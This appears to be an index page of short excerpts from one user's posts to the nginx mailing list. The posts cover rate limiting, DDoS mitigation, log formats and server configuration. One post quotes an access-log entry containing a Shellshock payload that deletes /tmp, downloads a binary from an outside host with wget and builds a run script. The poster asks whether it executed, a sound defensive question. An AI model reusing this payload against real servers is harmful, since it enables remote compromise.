Seeing that nobody beat me to it, I did the download manager experiment. There are plugins for Chromium to do multiple connections, but I figured a stand alone program was safer. (No use adding strange software to a reasonable secure browser.) My linux disty has prozilla in the repo. In true linux tradition, the actual executable is not prozilla but rather proz. I requested 8 connections, but Iby gariac - Nginx Mailing List - English
Most of the chatter on the interwebs believes that the rate limit is per connection, so if some IP opens up multiple connections, they get more bandwidth. It shouldn't be that hard to just test this by installing a manager and seeing what happens. I will give this a try tonight, but hopefully someone will beat me to it. Relevant post follows: ----------- On 17 February 2014 10:02, Bozhidaraby gariac - Nginx Mailing List - English
I picked 444 based on the following, though I see your point in that it is a non-standard code. I guess from a multiplier standpoint, returning nothing is as minimal as it gets, but the hacker often sends the message twice due to lack of response. A 304 return to an attempt to log into WordPress would seem a bit weird. All I really need is a unique code to find in the log file. 444 CONNECTIby gariac - Nginx Mailing List - English
https://www.nginx.com/blog/tuning-nginx/ I have far more faith in this write up regarding tuning than the anti-ddos, though both have similarities. My interpretation is the user bandwidth is connections times rate. But you can't limit the connection to one because (again my interpretation) there can be multiple users behind one IP. Think of a university reading your website. Thus I am moby gariac - Nginx Mailing List - English
This page has all the secret sauce, including how to limit the number of connections. https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/ I set up the firewall with a higher number as a "just in case." Also note if you do streaming outside nginx, then you have to limit connections for that service in the program providing it. Mind you while I think thiby gariac - Nginx Mailing List - English
I suspect you are referring to the countless variations on the favicon, with Apple being the worst offender since they have many "touch" files. Android has them too. Just make the files. They don't have to be works of art. http://iconifier.net/ One of many generators. Clearly Apple has no respect for the webmaster. But Microsoft has gone one step beyond that, requiring some sort of Xby gariac - Nginx Mailing List - English
_______________________________________________ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginxby gariac - Nginx Mailing List - English
Since this limit is per IP, is the scenario you stated really a problem? Only that IP is effected. Or as is often the case, did I miss something? http://nginx.org/en/docs/http/ngx_http_limit_req_module.html Original Message From: Grant Sent: Thursday, September 8, 2016 6:24 PM To: nginx@nginx.org Reply To: nginx@nginx.org Subject: limit-req and greedy UAs Has anyone considered the probby gariac - Nginx Mailing List - English
Thanks. I will fix the line and report back. I'm not really using the xyz tld. The lines should be commented out. I'm just using the com. But I will check that as well Original Message From: Reinis Rozitis Sent: Tuesday, August 23, 2016 1:32 PM To: nginx@nginx.org Reply To: nginx@nginx.org Subject: Re: Problems with custom log file format > Without the specified format so ses the deby gariac - Nginx Mailing List - English
Link goes to conf file https://www.dropbox.com/s/1gz5139s4q3b7e0/nginx.conf?dl=0 On Tue, 23 Aug 2016 20:51:55 +0300 "Reinis Rozitis" <r@roze.lv> wrote: > > Configuration file included in the post. I already checked it. > > You have shown only few excerpts (like there might be other > access_log directives in other parts included config files (easily > missed wby gariac - Nginx Mailing List - English
Configuration file included in the post. I already checked it. Original Message From: Maxim Dounin Sent: Tuesday, August 23, 2016 10:10 AM To: nginx@nginx.org Reply To: nginx@nginx.org Subject: Re: Problems with custom log file format Hello! On Tue, Aug 23, 2016 at 10:07:56AM -0700, lists@lazygranch.com wrote: > Looks like I have no takers on this problem. Should I filed a > bugby gariac - Nginx Mailing List - English
Looks like I have no takers on this problem. Should I filed a bug report? If so, where? Original Message From: lists@lazygranch.com Sent: Sunday, August 21, 2016 7:02 PM To: nginx@nginx.org Reply To: nginx@nginx.org Subject: Problems with custom log file format Nginx 1.10.1,2 FreeBSD 10.2-RELEASE-p18 #0: Sat May 28 08:53:43 UTC 2016 I'm using the "map" module to detect obviouby gariac - Nginx Mailing List - English
Nginx 1.10.1,2 FreeBSD 10.2-RELEASE-p18 #0: Sat May 28 08:53:43 UTC 2016 I'm using the "map" module to detect obvious hacking by detecting keywords. (Yes, I know about Naxsi.) Finding the really dumb hacks is easy. I give them a 444 return code with the idea being I can run a script on the log file and block these IPs. (Yes, I know about swatch.) My problem is the access.log doesn'tby gariac - Nginx Mailing List - English
On Sat, 30 Jul 2016 23:49:30 +0300 "Valentin V. Bartenev" <vbart@nginx.com> wrote: > On Saturday 30 July 2016 10:52:46 lists@lazygranch.com wrote: > > On Sat, 30 Jul 2016 13:18:47 +0300 > > "Valentin V. Bartenev" <vbart@nginx.com> wrote: > > > > > On Friday 29 July 2016 23:01:05 lists@lazygranch.com wrote: > > > > I see aby gariac - Nginx Mailing List - English
Thanks. I am patched for shellshock. The 200 return code through me off. Original Message From: Reinis Rozitis Sent: Saturday, July 30, 2016 12:21 PM To: nginx@nginx.org Reply To: nginx@nginx.org Subject: Re: Bash script; Was it executed? > I see a return code of 200. Does that mean this script was executed? The return code is for GET request on /. Unless you have an index page that &by gariac - Nginx Mailing List - English
I see a return code of 200. Does that mean this script was executed? ------------- 219.153.48.45 - - [30/Jul/2016:07:40:07 +0000] "GET / HTTP/1.1" 200 643 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma >> /tmp/Run.sh;echo echo By China.Z >> /tmp/R un.sh;echo chmod >> 777 /tmp/China.Z-slma >by gariac - Nginx Mailing List - English
On Sat, 30 Jul 2016 13:18:47 +0300 "Valentin V. Bartenev" <vbart@nginx.com> wrote: > On Friday 29 July 2016 23:01:05 lists@lazygranch.com wrote: > > I see a fair amount of hacking attempts in the access.log. That is, > > they > show up with a return code of 400 (malformed). Well yeah, they are > certainly malformed. But when I add the offending IP address toby gariac - Nginx Mailing List - English
_______________________________________________ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginxby gariac - Nginx Mailing List - English
_______________________________________________ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginxby gariac - Nginx Mailing List - English
Does that really limit per the OP's request? Reading the document, it seems like a monitoring module, but not something that limits nginx. For example, ulimit is just a linux command. Maybe you could set a chron job to sniff the load based on this monitoring and adjust system parameters accordingly. (Beware of positive feedback loops.! This was my method to set limits on nginx. First, download htby gariac - Nginx Mailing List - English
Bear in mind one IP can be many eyeballs. I use the module with a setting of 10 per IP. I set the firewall to a higher limit to allow some non-web services, but not infinite. This can fight back a very unsophisticated DOS attack. A real DOS is distributed, so the IP limit won't be useful. I had a document hit Twitter and their servers hammered my lowly VPS. Besides an IP limit, I suggest a rby gariac - Nginx Mailing List - English
Thanks all. I will not use the catch all but will enter the www.example.com in the name server. I spent some time reading up on Nginx to be er um less stupid, but should have spent more time on DNS. ;-)by gariac - Nginx Mailing List - English
Well this looks so simple in the nginx manual. I have cleared the browser cache. so I am running out of simple idea. The domain is inplanesight.org. http://www.inplanesight.org will 404 http://inplanesight.org works fine Here is the server part of the nginx.conf file: --------------------------------------------------------------- server { listen 80; server_name inby gariac - Nginx Mailing List - English
Thanks halozen and Francis. Knowing where to read in the manual is half the battle. I think I will tackle combining the iredmail code into my own website since at the moment I only have one domain I am going to put on this server. With flexibility comes head scratching. It seems like nginx has two ways of doing everything.by gariac - Nginx Mailing List - English
I think I failed to explain my problem correctly. It seems to me whatever I do for the test would be on the server side, not client side. Studying your reply, I think your solution maps domain.com to ipaddress (dotted quad) from the client side. What I need to do is have the one ip address I have for the server host iredmail and my website. Iredmail creates an index.html in /var/www with conteby gariac - Nginx Mailing List - English
I have an existing website at a hosting service. I have contracted with a virtual server company and have installed iredmail, which in turn installs nginx, Since I have an ip address for the server, I am able to test the email service. Iredmail has a web based mail manager, so it has associated html code. Iredmail puts its html in /var/www. I put a test page in /var/www2 and added a locby gariac - Nginx Mailing List - English
Argh! Pilot error! Once I cleared the browser cache, the website works. Sorry to waste your time. Next time I post, I'll try to have a real problem.by gariac - Nginx Mailing List - English
Total newb here so apologies in advance. (Silly me, I could have set up Apache, but I decided to learn something new.) I have an existing website hosted on a server running apache. I am setting up a new server, this one being vitrual and bare bones, i.e. nothing installed but linux. OS is debian. Host company is ovh.com. I installed nginx from the repo rather than complile. Default file loby gariac - Nginx Mailing List - English